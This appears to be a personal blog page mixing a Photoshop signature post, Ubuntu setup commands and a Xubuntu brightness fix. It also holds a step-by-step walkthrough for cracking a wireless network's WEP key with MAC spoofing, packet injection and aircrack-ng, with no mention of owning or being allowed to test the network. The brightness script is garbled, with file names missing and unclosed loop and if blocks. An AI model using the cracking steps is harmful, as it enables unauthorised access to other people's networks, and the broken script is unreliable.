My Photoshop art

This is one of my Photoshop arts, my signature. It defines me totally.
If you want to learn how it’s done, it’s not that hard, all you have to do is get your Thunder brushes from the web and make new layers with each thunder.
Place the thunders on the names, reduce opacity and voila.

Other Ubuntu stuff related

sudo dpkg-reconfigure tzdata
For Xubuntu Codecs:

sudo apt-get install ubuntu-restricted-extras

The are some needed stuff. Right after your Ubuntu starts you have to write these down if you want to be able to watch youtube clips.

Using Backtrack for Wireless

  1. Open a Shell
  • airmon-ng
Under interface=> Device using “eth0” example…
  1. airmon-ng stop eht0
  2. ifconfig eht0 down
  3. macchanger –mac 00:11:22:33:44:55 eth0
  4. airmon-ng start eth0
  5. airodump-ng eth0
A box will appear, check the SSID.
  1. airodump-ng -c (channel) -w (filename) –bssid (bssid) eth0
Minimize the window now.
Open another Shell:
  1. aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 eth0
>> This is a packet injection process, it may or may not work…who cares..
  1. aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 eth0
Go back to your first window
Look at #DATA -There has to be AT LEAST 10.000 packets of data before cracking.
Open a THIRD Shell
  1. aircrack-ng -b (BSSID) (filename-01.cap)
Your result will be displayed.
Programe folosite de-alungul procesului:
  1. airmon-ng
  2. ifconfig
  3. macchanger
  4. airodump-ng
  5. aireplay-ng
  6. aircrack-ng

Fix Brightness on Xubuntu

To implement that script, follow these instructions:
1. In a terminal window, type in:
mousepad ./ mousepad application will open)
2. Copy and paste the following into the mousepad application that just opened:
declare -i curr_b=240;
declare -i target_b=240;
while : ; do
b=`cat /sys/class/backlight/acpi_video0/brightness`;
if [ $old_b != $b ]; then
let “target_b=$b * 20 + 12”
#printf “Target: %10d\n” $target_b
if [ “$curr_b” -lt “$target_b” ] ; then
let “curr_b=$curr_b + 2”
if [ “$curr_b” -gt “$target_b” ] ; then
let “curr_b=$target_b”
elif [ “$curr_b” -gt “$target_b” ] ; then
let “curr_b=$curr_b – 2”
if [ “$curr_b” -lt “$target_b” ] ; then
let “curr_b=$target_b”
if [ $hex_b != “.” ] ; then
hex_b=`printf “%02X” $curr_b`
setpci -s 00:02.0 F4.B=$hex_b
sleep $delay
3. Save the file:
File->Save4. Back in the terminal window, type in the following:
sudo cp ./ /etc/ && sudo chmod +x /etc/ your password when prompted).
5. Enter the following into the terminal window:
sudo mousepad /etc/rc.local(mousepad will open again) and before the exit 0 line, type in the following:
nohup /etc/ &
 so it looks like:
nohup /etc/ &
exit 0
Restart your computer. According to that article, you should be able to adjust your brightness. Post back and let us know if it works. If not, there are a few other things we can try.
This truly works, I’ve tried it many times. In the past, everytime I had an issue with Xubuntu I was reinstalling it, instead of fixing the problem. So now that I found the explanation feel free to use it for good purposes.
